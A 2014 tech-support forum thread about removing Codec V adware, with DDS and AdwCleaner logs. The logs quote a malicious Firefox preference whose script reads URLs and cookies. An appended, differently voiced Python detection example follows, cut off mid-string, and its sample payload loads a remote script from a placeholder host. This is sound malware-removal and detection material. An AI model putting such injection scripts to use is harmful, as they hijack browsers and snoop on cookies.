Windows not genuine messages, Codec V malware


This topic is locked
16 replies to this topic

#1 phill!

  • Members
  • 18 posts
  • OFFLINE

Posted 25 September 2014 - 11:44 AM

Hello there, I originally posted under "Am I infected? What do I do?"

http://www.bleepingcomputer.com/forums/t/549460/malware-counterfeit-messages-cant-update/

 

A friend of mine was getting a "hard drive failure imminent" message when she rebooted her 64-bit Windows 7 Home Premium machine.  I created a system image using Windows and then used an install disc and restored the image on her new hard drive.  Ever since then she's been getting a message telling her that Windows may not be genuine.

 

When I view her computer properties it says that Windows is activated.  I've seen other people post that a hard drive swap caused Windows to forget it was activated, but I'm about half convinced it's actually a malware issue.  I've run a Malwarebytes scan, Immunet 3 scan, Spybot S&D, AdwCleaner, and they all come back with something, at least the first couple of scans.  I'm still seeing ads from Codec V, even on my own personal site that has no similar ads.  If I try to run Windows Update it says that the service is not running, but I've personally restarted the Windows Update service several times and that doesn't change.

 

I included a mgadiag log in the original post and then when asked replied with the following:

1. checkup.txt from SecurityCheck.exe

2. FSS.txt from Farbar Service Scanner

3. Result.txt from MiniToolBox

4. Malwarebytes Anti-Malware scan results

5. mbar-log...txt & system-log.txt from Malwarebytes Anti-Rootkit

6. rKill.txt

 

Below is my most recently asked-for DDS.txt log.  And attached is my DDS attach.zip.

 

Thank you very much,

Phil

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 11.0.9600.17239
Run by Camille at 11:19:13 on 2014-09-25
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.6134.4190 [GMT -5:00]
.
AV: Microsoft Security Essentials *Disabled/Updated* {108DAC43-C256-20B7-BB05-914135DA5160}
AV: Immunet 3 *Enabled/Updated* {D3417D79-6FAC-4B50-D487-4BA8768A0AA4}
SP: Microsoft Security Essentials *Disabled/Updated* {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Spybot - Search and Destroy *Enabled/Updated* {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\System32\svchost.exe -k NetworkService
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskhost.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Windows\system32\taskeng.exe
C:\Program Files (x86)\Cisco Systems\VPN Client\cvpnd.exe
C:\Program Files (x86)\Juniper Networks\Common Files\dsNcService.exe
C:\Program Files\Immunet\3.1.13\sfc.exe
C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
C:\Program Files\Immunet\3.1.13\iptray.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\ProgramData\Skype\Toolbars\Skype C2C Service\c2c_service.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\taskeng.exe
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
c:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe
C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Program Files (x86)\TeamViewer\Version9\tv_w32.exe
C:\Program Files (x86)\TeamViewer\Version9\tv_x64.exe
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Windows\system32\igfxsrvc.exe
C:\Windows\System32\WUDFHost.exe
c:\program files (x86)\teamviewer\version9\TeamViewer_Desktop.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Windows Live Messenger Companion Helper: {9FDDE16B-836F-4806-AB1F-1455CBEFF289} - C:\Program Files (x86)\Windows Live\Companion\companioncore.dll
BHO: Skype Browser Helper: {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
BHO: Adblock Plus for IE Browser Helper Object: {FFCB3198-32F3-4E8B-9539-4324694ED664} - C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll
mRun: [Immunet Protect] "C:\Program Files\Immunet\3.1.13\iptray.exe"
mRun: [SDTray] "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:0
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableLUA = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: PromptOnSecureDesktop = dword:0
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~2\Office12\EXCEL.EXE/3000
IE: {0000036B-C524-4050-81A0-243669A86B9F} - {B63DBA5F-523F-4B9C-A43D-65DF1977EAD3} - C:\Program Files (x86)\Windows Live\Companion\companioncore.dll
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office12\ONBttnIE.dll
IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
Trusted Zone: $talisma_url$
DPF: {1239CC52-59EF-4DFA-8C61-90FFA846DF7E} - hxxp://www.musicnotes.com/download/mnviewer.cab
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {3107C2A8-9F0B-4404-A58B-21BD85268FBC} - hxxp://www.pogo.com/cdl/launcher/PogoWebLauncherInstaller.CAB
DPF: {8100D56A-5661-482C-BEE8-AFECE305D968} - hxxp://upload.facebook.com/controls/2009.07.28_v5.5.8.1/FacebookPhotoUploader55.cab
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_26-windows-i586.cab
DPF: {A8F2B9BD-A6A0-486A-9744-18920D898429} - hxxp://www.sibelius.com/download/software/win/ActiveXPlugin.cab
DPF: {CAFEEFAC-0016-0000-0026-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_26-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_26-windows-i586.cab
DPF: {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} - hxxp://games.pogo.com/online2/pogo/bejeweled2/popcaploader_v6.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: {F27237D7-93C8-44C2-AC6E-D6057B9A918F} - hxxps://hscvpn.uthscsa.edu/dana-cached/sc/JuniperSetupClient.cab
TCP: NameServer = 192.168.1.254
TCP: Interfaces\{6D210378-D3EC-42F6-9AD7-399C50A47598} : DHCPNameServer = 192.168.1.254
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveSystemServices.dll
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
Notify: SDWinLogon - SDWinLogon.dll
SSODL: WebCheck - <orphaned>
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Skype add-on for Internet Explorer: {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-BHO: Adblock Plus for IE Browser Helper Object: {FFCB3198-32F3-4E8B-9539-4324694ED664} - C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll
x64-IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-DPF: {AA570693-00E2-4907-B6F1-60A1199B030C} - hxxps://juniper.net/dana-cached/sc/JuniperSetupClient64.cab
x64-Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - <orphaned>
x64-Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Camille\AppData\Roaming\Mozilla\Firefox\Profiles\cc3diwjc.default\
FF - prefs.js: browser.search.defaulturl - 
FF - prefs.js: browser.search.selectedEngine - Google
FF - prefs.js: browser.startup.homepage - about:home
FF - plugin: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Common Files\Motive\npMotive.dll
FF - plugin: C:\Program Files (x86)\Java\jre6\bin\new_plugin\npdeployJava1.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\Users\Camille\AppData\Local\Citrix\Plugins\104\npappdetector.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_224.dll
.
============= SERVICES / DRIVERS ===============
.
R1 ImmunetProtectDriver;ImmunetProtectDriver;C:\Windows\System32\drivers\immunetprotect.sys [2014-9-3 58064]
R1 ImmunetSelfProtectDriver;ImmunetSelfProtectDriver;C:\Windows\System32\drivers\immunetselfprotect.sys [2014-9-3 32976]
R1 MpFilter;Microsoft Malware Protection Driver;C:\Windows\System32\drivers\MpFilter.sys [2011-4-18 189440]
R2 ImmunetNetworkMonitorDriver;ImmunetNetworkMonitorDriver;C:\Windows\System32\drivers\ImmunetNetworkMonitor.sys [2014-9-3 100048]
R2 ImmunetProtect;Immunet 3;C:\Program Files\Immunet\3.1.13\sfc.exe [2014-9-3 546208]
R2 PassThru Service;Internet Pass-Through Service;C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe [2013-12-7 167424]
R2 SDScannerService;Spybot-S&D 2 Scanner Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [2014-9-21 1738168]
R2 SDUpdateService;Spybot-S&D 2 Updating Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2014-9-21 2088408]
R2 SDWSCService;Spybot-S&D 2 Security Center Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [2014-9-21 171928]
R2 Skype C2C Service;Skype C2C Service;C:\ProgramData\Skype\Toolbars\Skype C2C Service\c2c_service.exe [2012-11-22 3290304]
R2 TeamViewer9;TeamViewer 9;C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe [2014-9-21 4799760]
R3 MpNWMon;Microsoft Malware Protection Network Driver;C:\Windows\System32\drivers\MpNWMon.sys [2011-4-18 40832]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2009-10-8 233472]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-10-23 172192]
S3 fssfltr;fssfltr;C:\Windows\System32\drivers\fssfltr.sys [2011-12-4 48488]
S3 fsssvc;Windows Live Family Safety Service;C:\Program Files (x86)\Windows Live\Family Safety\fsssvc.exe [2011-5-13 1492840]
S3 HTCAND64;HTC Device Driver;C:\Windows\System32\drivers\ANDROIDUSB.sys [2009-11-2 33736]
S3 htcnprot;HTC NDIS Protocol Driver;C:\Windows\System32\drivers\htcnprot.sys [2012-12-7 36928]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2014-8-15 111616]
S3 LVPr2M64;Logitech LVPr2M64 Driver;C:\Windows\System32\drivers\LVPr2M64.sys [2009-10-7 30232]
S3 LVUVC64;Logitech Webcam 120(UVC);C:\Windows\System32\drivers\lvuvc64.sys [2009-10-7 6379288]
S3 NisDrv;Microsoft Network Inspection System;C:\Windows\System32\drivers\NisDrvWFP.sys [2011-4-27 84864]
S3 NisSrv;Microsoft Network Inspection;C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [2011-4-27 288272]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;C:\Windows\System32\drivers\rdpvideominiport.sys [2013-4-14 19456]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2013-4-14 57856]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2012-12-13 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2010-3-11 1255736]
S4 LVPrcS64;Process Monitor;C:\Program Files\Common Files\logishrd\LVMVFM\LVPrcSrv.exe [2009-10-7 191000]
S4 McciCMService64;McciCMService64;C:\Program Files\Common Files\Motive\McciCMService.exe [2011-6-20 517632]
S4 McciServiceHost;McciServiceHost;"C:\Program Files (x86)\Common Files\Motive\McciServiceHost.exe" --> C:\Program Files (x86)\Common Files\Motive\McciServiceHost.exe [?]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== File Associations ===============
.
FileExt: .inf: inffile=C:\Windows\System32\NOTEPAD.EXE %1 [UserChoice]
.
=============== Created Last 30 ================
.
2014-09-24 14:00:41 -------- d-----w- C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-23 16:09:58 -------- d-----w- C:\MGADiagToolOutput
2014-09-23 15:52:49 972264 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{394FDFDE-6E2F-49A5-9A32-6C391F41BCC2}\gapaengine.dll
2014-09-23 15:52:45 -------- d-sh--w- C:\$RECYCLE.BIN
2014-09-23 15:41:45 98816 ----a-w- C:\Windows\sed.exe
2014-09-23 15:41:45 256000 ----a-w- C:\Windows\PEV.exe
2014-09-23 15:41:45 208896 ----a-w- C:\Windows\MBR.exe
2014-09-23 15:40:54 -------- d-s---w- C:\ComboFix
2014-09-23 15:22:37 -------- d-----w- C:\Windows\ERUNT
2014-09-23 15:08:55 972264 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{5885BE9D-013D-415A-81C2-188516B3B288}\gapaengine.dll
2014-09-22 02:28:19 -------- d-----w- C:\AdwCleaner
2014-09-22 02:10:49 -------- d-----w- C:\Users\Camille\AppData\Roaming\TeamViewer
2014-09-22 02:10:45 -------- d-----w- C:\Program Files (x86)\TeamViewer
2014-09-22 01:52:07 -------- d-----w- C:\Windows\System32\catroot2
2014-09-22 01:51:58 21040 ----a-w- C:\Windows\System32\sdnclean64.exe
2014-09-22 01:51:56 -------- d-----w- C:\ProgramData\Spybot - Search & Destroy
2014-09-22 01:51:49 -------- d-----w- C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-09-22 01:50:57 -------- d-----w- C:\Windows\softwaredistribution.old
2014-09-22 01:30:02 388096 ----a-r- C:\Users\Camille\AppData\Roaming\Microsoft\Installer\{45A66726-69BC-466B-A7A4-12FCBA4883D7}\HiJackThis.exe
2014-09-22 01:30:02 -------- d-----w- C:\Program Files (x86)\Trend Micro
2014-09-03 18:15:11 -------- d-----w- C:\Program Files\Adblock Plus for IE
2014-09-03 18:09:37 -------- d-----w- C:\ProgramData\Immunet
2014-09-03 18:09:27 100048 ----a-w- C:\Windows\System32\drivers\ImmunetNetworkMonitor.sys
2014-09-03 18:09:26 58064 ----a-w- C:\Windows\System32\drivers\immunetprotect.sys
2014-09-03 18:09:26 32976 ----a-w- C:\Windows\System32\drivers\immunetselfprotect.sys
2014-09-03 18:09:25 329800 ----a-w- C:\Windows\System32\drivers\trufos.sys
2014-09-03 18:09:23 -------- d-----w- C:\Program Files\Immunet
2014-09-03 17:25:18 128728 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-09-03 17:25:11 92888 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2014-09-03 17:25:11 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys
2014-09-03 17:25:11 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-08-28 21:23:13 -------- d-----w- C:\Program Files\CCleaner
2014-08-28 03:50:44 404480 ----a-w- C:\Windows\System32\gdi32.dll
2014-08-28 03:50:44 3163648 ----a-w- C:\Windows\System32\win32k.sys
2014-08-28 03:50:44 311808 ----a-w- C:\Windows\SysWow64\gdi32.dll
.
==================== Find3M  ====================
.
2014-08-07 02:06:41 529920 ----a-w- C:\Windows\System32\aepdu.dll
2014-08-07 02:01:34 424448 ----a-w- C:\Windows\System32\aeinv.dll
2014-07-25 14:02:12 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2014-07-25 14:01:41 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2014-07-25 13:30:30 66048 ----a-w- C:\Windows\System32\iesetup.dll
2014-07-25 13:28:35 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2014-07-25 13:28:27 548352 ----a-w- C:\Windows\System32\vbscript.dll
2014-07-25 13:25:45 83968 ----a-w- C:\Windows\System32\MshtmlDac.dll
2014-07-25 13:04:40 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2014-07-25 13:00:51 139264 ----a-w- C:\Windows\System32\ieUnatt.exe
2014-07-25 13:00:25 111616 ----a-w- C:\Windows\System32\ieetwcollector.exe
2014-07-25 12:59:28 758272 ----a-w- C:\Windows\System32\jscript9diag.dll
2014-07-25 12:47:25 940032 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2014-07-25 12:34:49 61952 ----a-w- C:\Windows\SysWow64\iesetup.dll
2014-07-25 12:34:03 455168 ----a-w- C:\Windows\SysWow64\vbscript.dll
2014-07-25 12:33:08 51200 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2014-07-25 12:30:32 61952 ----a-w- C:\Windows\SysWow64\MshtmlDac.dll
2014-07-25 12:28:15 5824512 ----a-w- C:\Windows\System32\jscript9.dll
2014-07-25 12:28:05 72704 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2014-07-25 12:10:15 112128 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2014-07-25 12:08:47 597504 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2014-07-25 12:06:47 4204032 ----a-w- C:\Windows\SysWow64\jscript9.dll
2014-07-25 11:43:16 60416 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2014-07-25 11:39:29 2087936 ----a-w- C:\Windows\System32\inetcpl.cpl
2014-07-25 11:39:25 1249280 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2014-07-25 11:07:49 2001920 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2014-07-25 11:07:10 1068032 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2014-07-25 10:52:06 2266624 ----a-w- C:\Windows\System32\wininet.dll
2014-07-25 10:05:23 1792512 ----a-w- C:\Windows\SysWow64\wininet.dll
2014-07-16 03:23:41 2048 ----a-w- C:\Windows\System32\tzres.dll
2014-07-16 02:46:02 2048 ----a-w- C:\Windows\SysWow64\tzres.dll
2014-07-14 02:02:45 1216000 ----a-w- C:\Windows\System32\rpcrt4.dll
2014-07-14 01:40:58 664064 ----a-w- C:\Windows\SysWow64\rpcrt4.dll
2014-06-30 22:24:50 8856 ----a-w- C:\Windows\System32\icardres.dll
2014-06-30 22:14:53 8856 ----a-w- C:\Windows\SysWow64\icardres.dll
.
============= FINISH: 11:20:01.55 ===============

#2 nasdaq

  • Malware Response Team
  • 39,903 posts
  • OFFLINE
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 29 September 2014 - 08:03 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can, please print this topic; it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Please download AdwCleaner by Xplode onto your Desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Click the Report button and the report will open in Notepad.
IMPORTANT
  • If you click the Clean button all items listed in the report will be removed.
If you find some false-positive items or programs that you wish to keep, close the AdwCleaner windows.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Check off the element(s) you wish to keep.
  • Click on the Clean button and follow the prompts.
  • A log file will automatically open after the scan has finished.
  • Please post the content of that log file with your next answer.
  • You can find the log file at C:\AdwCleaner[Sn].txt (n is a number).
===

Download the version of this tool for your operating system.
Farbar Recovery Scan Tool (64 bit)
Farbar Recovery Scan Tool (32 bit)
and save it to a folder on your computer's Desktop.
Double-click to run it. When the tool opens click Yes to disclaimer.
Press Scan button.
It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply.
===

Please paste the logs in your next reply. DO NOT ATTACH THEM unless specified.
To attach a file, select "More Reply Options" and follow the instructions.

How is the computer running?
Wait for further instructions.

#3 phill!
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE

Posted 30 September 2014 - 03:23 PM

As stated, I had already run AdwCleaner, but I ran it again and here's the log:
 
# AdwCleaner v3.310 - Report created 30/09/2014 at 15:09:18
# Updated 12/09/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Camille - HOMEPC
# Running from : C:\Users\Camille\Desktop\adwcleaner_3.310.exe
# Option : Scan
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
 
***** [ Scheduled Tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17239
 
 
-\\ Mozilla Firefox v32.0.3 (x86 en-US)
 
[ File : C:\Users\Camille\AppData\Roaming\Mozilla\Firefox\Profiles\cc3diwjc.default\prefs.js ]
 
Line Found : user_pref("extensions.50566b6281242.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"su[...]
 
*************************
 
AdwCleaner[R0].txt - [25068 octets] - [21/09/2014 21:28:24]
AdwCleaner[R1].txt - [1164 octets] - [23/09/2014 10:05:29]
AdwCleaner[R2].txt - [1027 octets] - [30/09/2014 15:09:18]
AdwCleaner[S0].txt - [25132 octets] - [21/09/2014 21:29:05]
AdwCleaner[S1].txt - [1228 octets] - [23/09/2014 10:07:59]
 
########## EOF - C:\AdwCleaner\AdwCleaner[R2].txt - [1208 octets] ##########


#4 phill!
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE

Posted 30 September 2014 - 03:29 PM

Sorry, this is the log after cleaning/reboot:

 

# AdwCleaner v3.310 - Report created 30/09/2014 at 15:24:08
# Updated 12/09/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Camille - HOMEPC
# Running from : C:\Users\Camille\Desktop\adwcleaner_3.310.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
 
***** [ Scheduled Tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17239
 
 
-\\ Mozilla Firefox v32.0.3 (x86 en-US)
 
[ File : C:\Users\Camille\AppData\Roaming\Mozilla\Firefox\Profiles\cc3diwjc.default\prefs.js ]
 
Line Deleted : user_pref("extensions.50566b6281242.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"su[...]
 
*************************
 
AdwCleaner[R0].txt - [25068 octets] - [21/09/2014 21:28:24]
AdwCleaner[R1].txt - [1164 octets] - [23/09/2014 10:05:29]
AdwCleaner[R2].txt - [1288 octets] - [30/09/2014 15:09:18]
AdwCleaner[S0].txt - [25132 octets] - [21/09/2014 21:29:05]
AdwCleaner[S1].txt - [1228 octets] - [23/09/2014 10:07:59]
AdwCleaner[S2].txt - [1211 octets] - [30/09/2014 15:24:08]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S2].txt - [1271 octets] ##########
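The AdwCleaner reports above flagged a Firefox preference (extensions.50566b6281242.scode) whose value is a JavaScript function that inspects the page URL and cookies, which is how this adware persisted across browser restarts. The following is an added example (not the thread's or AdwCleaner's code): a small scanner that parses prefs.js lines and flags preferences whose string values carry script fragments or use an opaque extension id. The prefs.js content, including the ads.example.invalid domain, is constructed for the demo.

```python
"""Flag Firefox prefs.js entries that store JavaScript instead of settings.

A prefs.js line has the shape:  user_pref("name", <value>);
String values are JS string literals, so \" escapes must be decoded
before the value is inspected.
"""
import json
import re
from typing import List, Optional, Tuple

PREF_RE = re.compile(r'^\s*user_pref\("([^"]+)",\s*(.*)\);\s*$')

# Fragments that indicate code rather than an ordinary setting value.
SCRIPT_MARKERS = (
    "(function(", "function(){", "document.cookie", "location.href",
    "eval(", "indexOf(", "document.write", "<script",
)

# Adware often parks its payload under extensions.<random hex>.<key>.
OPAQUE_EXT_RE = re.compile(r"extensions\.[0-9a-f]{8,}\.[A-Za-z]+")

# Constructed sample prefs.js: three ordinary prefs plus one injected
# "scode" entry modelled on the AdwCleaner finding (domain is a placeholder).
SAMPLE_PREFS = r'''# Mozilla User Preferences
user_pref("browser.search.selectedEngine", "Google");
user_pref("browser.startup.homepage", "about:home");
user_pref("extensions.lastAppVersion", "32.0.3");
user_pref("extensions.50566b6281242.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"ads.example.invalid\")>-1){return;}var s=document.createElement(\"script\");s.src=\"http://ads.example.invalid/j.js\";document.body.appendChild(s);}catch(e){}})();");
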